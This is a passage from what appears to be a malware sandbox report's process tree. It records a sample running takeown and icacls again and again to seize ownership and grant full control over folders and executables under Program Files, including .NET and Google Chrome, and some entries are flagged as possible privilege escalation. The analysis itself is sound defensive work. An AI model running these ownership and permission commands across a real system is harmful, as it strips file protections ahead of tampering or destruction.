  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App" /a
  2⤵
  PID:4516
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App" /grant Administrators:F
  2⤵
  PID:2112
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27" /a
  2⤵
  PID:4716
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:2416
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\cs" /a
  2⤵
  PID:4880
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\cs" /grant Administrators:F
  2⤵
  PID:5904
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\de" /a
  2⤵
  PID:1524
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\de" /grant Administrators:F
  2⤵
  PID:5872
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\es" /a
  2⤵
  PID:5000
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\es" /grant Administrators:F
  2⤵
  PID:1604
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\fr" /a
  2⤵
  PID:1448
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\fr" /grant Administrators:F
  2⤵
  PID:2012
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\it" /a
  2⤵
  - Modifies file permissions
  PID:4996
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\it" /grant Administrators:F
  2⤵
  PID:3120
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ja" /a
  2⤵
  PID:1196
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ja" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:5164
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ko" /a
  2⤵
  PID:5588
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ko" /grant Administrators:F
  2⤵
  PID:5644
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pl" /a
  2⤵
  PID:4080
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pl" /grant Administrators:F
  2⤵
  PID:2240
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pt-BR" /a
  2⤵
  PID:3580
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pt-BR" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:2880
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ru" /a
  2⤵
  PID:1808
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ru" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:1660
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\tr" /a
  2⤵
  PID:4048
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\tr" /grant Administrators:F
  2⤵
  PID:5716
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\zh-Hans" /a
  2⤵
  PID:4432
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\zh-Hans" /grant Administrators:F
  2⤵
  PID:2580
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\zh-Hant" /a
  2⤵
  PID:5044
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\zh-Hant" /grant Administrators:F
  2⤵
  PID:5096
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16" /a
  2⤵
  PID:1668
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16" /grant Administrators:F
  2⤵
  PID:2820
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\cs" /a
  2⤵
  - Modifies file permissions
  PID:5768
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\cs" /grant Administrators:F
  2⤵
  PID:4404
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\de" /a
  2⤵
  PID:6092
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\de" /grant Administrators:F
  2⤵
  PID:5624
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\es" /a
  2⤵
  PID:5072
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\es" /grant Administrators:F
  2⤵
  PID:5744
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\fr" /a
  2⤵
  PID:4604
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\fr" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:2184
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\it" /a
  2⤵
  PID:1904
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\it" /grant Administrators:F
  2⤵
  PID:5424
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ja" /a
  2⤵
  PID:2008
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ja" /grant Administrators:F
  2⤵
  PID:5116
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ko" /a
  2⤵
  PID:5724
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ko" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:3920
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\pl" /a
  2⤵
  - Possible privilege escalation attempt
  PID:2884
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\pl" /grant Administrators:F
  2⤵
  PID:2684
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\pt-BR" /a
  2⤵
  - Modifies file permissions
  PID:4704
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\pt-BR" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:3320
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ru" /a
  2⤵
  PID:6028
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ru" /grant Administrators:F
  2⤵
  PID:2200
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\tr" /a
  2⤵
  PID:5000
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\tr" /grant Administrators:F
  2⤵
  PID:4684
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hans" /a
  2⤵
  PID:5188
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hans" /grant Administrators:F
  2⤵
  PID:3224
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hant" /a
  2⤵
  PID:5616
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hant" /grant Administrators:F
  2⤵
  PID:3472
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2" /a
  2⤵
  PID:5128
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2" /grant Administrators:F
  2⤵
  PID:2376
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2240
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\cs" /a
  2⤵
  PID:1576
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\cs" /grant Administrators:F
  2⤵
  PID:2316
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\de" /a
  2⤵
  PID:5920
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\de" /grant Administrators:F
  2⤵
  PID:3532
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\es" /a
  2⤵
  PID:5404
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\es" /grant Administrators:F
  2⤵
  PID:3428
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\fr" /a
  2⤵
  PID:4892
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5716
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\fr" /grant Administrators:F
  2⤵
  PID:3952
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\it" /a
  2⤵
  PID:4636
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\it" /grant Administrators:F
  2⤵
  PID:1872
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ja" /a
  2⤵
  PID:4368
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ja" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:4968
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ko" /a
  2⤵
  - Modifies file permissions
  PID:5420
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ko" /grant Administrators:F
  2⤵
  PID:1260
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pl" /a
  2⤵
  PID:2264
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pl" /grant Administrators:F
  2⤵
  PID:5336
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pt-BR" /a
  2⤵
  PID:5680
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pt-BR" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:5672
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ru" /a
  2⤵
  - Possible privilege escalation attempt
  PID:2112
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ru" /grant Administrators:F
  2⤵
  PID:1500
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\tr" /a
  2⤵
  - Possible privilege escalation attempt
  PID:4604
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2184
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\tr" /grant Administrators:F
  2⤵
  PID:3084
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\zh-Hans" /a
  2⤵
  PID:4960
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\zh-Hans" /grant Administrators:F
  2⤵
  PID:288
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\zh-Hant" /a
  2⤵
  PID:856
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\zh-Hant" /grant Administrators:F
  2⤵
  PID:332
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\swidtag" /a
  2⤵
  PID:5348
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\swidtag" /grant Administrators:F
  2⤵
  PID:540
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4412_1118546350" /a
  2⤵
  PID:5312
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4412_1118546350" /grant Administrators:F
  2⤵
  PID:4996
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4412_1258822285" /a
  2⤵
  PID:1524
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4412_1258822285" /grant Administrators:F
  2⤵
  PID:2408
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4412_1499609817" /a
  2⤵
  PID:4940
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4412_1499609817" /grant Administrators:F
  2⤵
  PID:6028
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4684
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4412_1712443353" /a
  2⤵
  - Possible privilege escalation attempt
  PID:5940
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4412_1712443353" /grant Administrators:F
  2⤵
  PID:3128
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4412_1924035120" /a
  2⤵
  PID:3360
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4412_1924035120" /grant Administrators:F
  2⤵
  PID:5748
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4412_528379050" /a
  2⤵
  PID:228
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4412_528379050" /grant Administrators:F
  2⤵
  PID:5572
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4412_680018440" /a
  2⤵
  PID:5464
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4412_680018440" /grant Administrators:F
  2⤵
  PID:3580
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4412_970727265" /a
  2⤵
  PID:5384
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4412_970727265" /grant Administrators:F
  2⤵
  PID:5092
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4520_1919513328" /a
  2⤵
  - Possible privilege escalation attempt
  PID:1400
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4520_1919513328" /grant Administrators:F
  2⤵
  PID:4492
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4596_1110536658" /a
  2⤵
  PID:5828
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4596_1110536658" /grant Administrators:F
  2⤵
  PID:4404
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4664_1657696765" /a
  2⤵
  PID:4376
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4664_1657696765" /grant Administrators:F
  2⤵
  PID:4544
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4664_1902151213" /a
  2⤵
  PID:3428
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5404
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4664_1902151213" /grant Administrators:F
  2⤵
  PID:5680
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4736_1164877528" /a
  2⤵
  PID:4568
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5672
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4736_1164877528" /grant Administrators:F
  2⤵
  PID:3244
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4736_124933937" /a
  2⤵
  - Modifies file permissions
  PID:3592
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4736_124933937" /grant Administrators:F
  2⤵
  PID:1500
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4736_1989589400" /a
  2⤵
  PID:5528
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4736_1989589400" /grant Administrators:F
  2⤵
  PID:1416
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4860_1146586963" /a
  2⤵
  PID:4696
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4860_1146586963" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:1344
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google" /a
  2⤵
  PID:5396
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google" /grant Administrators:F
  2⤵
  PID:2432
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome" /a
  2⤵
  PID:1448
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome" /grant Administrators:F
  2⤵
  PID:3768
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application" /a
  2⤵
  - Possible privilege escalation attempt
  PID:3676
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application" /grant Administrators:F
  2⤵
  PID:856
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1524
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\chrome.exe" /a
  2⤵
  - Modifies file permissions
  PID:1560
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\chrome.exe" /grant Administrators:F
  2⤵
  PID:4100
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3224
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60" /a
  2⤵
  PID:3128
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2376
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:636
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60\chrome_pwa_launcher.exe" /a
  2⤵
  PID:2492
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60\chrome_pwa_launcher.exe" /grant Administrators:F
  2⤵
  PID:5476
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60\default_apps" /a
  2⤵
  PID:4148
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60\default_apps" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:5180
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60\Extensions" /a
  2⤵
  PID:3268
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60\Extensions" /grant Administrators:F
  2⤵
  PID:1228
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer" /a
  2⤵
  PID:2104
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer" /grant Administrators:F
  2⤵
  PID:1640
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\chrmstp.exe" /a
  2⤵
  - Modifies file permissions
  PID:5304
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\chrmstp.exe" /grant Administrators:F
  2⤵
  PID:4504
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60\Locales" /a
  2⤵
  PID:4652
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60\Locales" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:5744
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60\MEIPreload" /a
  2⤵
  PID:4040
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60\MEIPreload" /grant Administrators:F
  2⤵
  PID:3684
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60\PrivacySandboxAttestationsPreloaded" /a
  2⤵
  PID:5116
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60\PrivacySandboxAttestationsPreloaded" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:4620
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60\VisualElements" /a
  2⤵
  PID:4364
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60\VisualElements" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:4748
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60\WidevineCdm" /a
  2⤵
  PID:1344
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2432
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60\WidevineCdm" /grant Administrators:F
  2⤵
  PID:4200
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60\WidevineCdm\_platform_specific" /a
  2⤵
  - Modifies file permissions
  PID:5112
- C:\windows\system32\icacls.exe
